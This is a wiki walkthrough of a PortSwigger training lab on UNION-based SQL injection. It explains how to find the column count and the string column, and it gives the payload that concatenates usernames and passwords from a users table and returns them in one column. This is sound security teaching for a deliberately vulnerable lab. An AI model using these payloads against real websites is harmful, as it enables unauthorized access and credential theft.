SQL injection UNION attack, retrieving multiple values in a single column - KA4KA4/PortSwigger-SQL-injection-Labs GitHub Wiki

hello, let's start he lab

access the machine and go to gift module then intercept request then send request to repeater.

in real world bug bounty, we need to get error in response of request to detect SQL injection on website. and from error we can know how database handling requests that come from user

we can get error by adding " or ' / or * or encoding or ....

so now get error: -

1

as you can see we get internal server error, this indicate that maybe SQL injection

it's time for testing.

remember this sentence: The doctor does not know the exact condition of the patient until he is examined.

now we can use query of SQL injection to know number of columns.

'+UNION+SELECT+NULL,NULL--

-EXPAIN: the query use union select. this is query used to retrieve data from other columns and get it in single row. then the second method (NULL) is value and used to detect number of columns and to detect data type of columns . then end the query with -- is a comment indicator in SQL, which will cause the rest of the query to be ignored.

after knowing the query first this we need to know number of columns. we know that via add null value until get error , when we get error this mean that this column is not exist.

after add null into query we know number of columns are two

2

now we need to know data type of columns. meaning that e need to know which column string and which column is integer.

try add string value in first colum

3

the error indicate that the first column is not string

try add string value in second column

4

now we not get error, this means the second column is string, and that what we will working on it

portswigger gave us names of column names and table names, we need to gat username and password from table, we will use CONCATINATION.

-CONCATINATION: this operation in programming language indicate to merge two or more values in one column and use operator such as || this is operator and used to concatenate the username and password fields together

this means we can get the username and password fields together in second column.

note we cant use the first becouse this is not string.

now add then query

'+UNION+SELECT+NULL,username||'='||password+FROM+users--

-aggregate explain: we use union select to retrieve data from other tables. then detect number of columns that in tables. then knoing datatype of each column to add strings and know the second column is string. then use concatenation operator to merge two columns (username & password) in the value from users table. and end query with -- to a comment indicator in SQL, which will cause the rest of the query to be ignored.

5

copy url of response and paste it in brawser

6

no we have sername and password

to solve the lab ligin with admin user

7

now we solve the lab. thank you! 🥇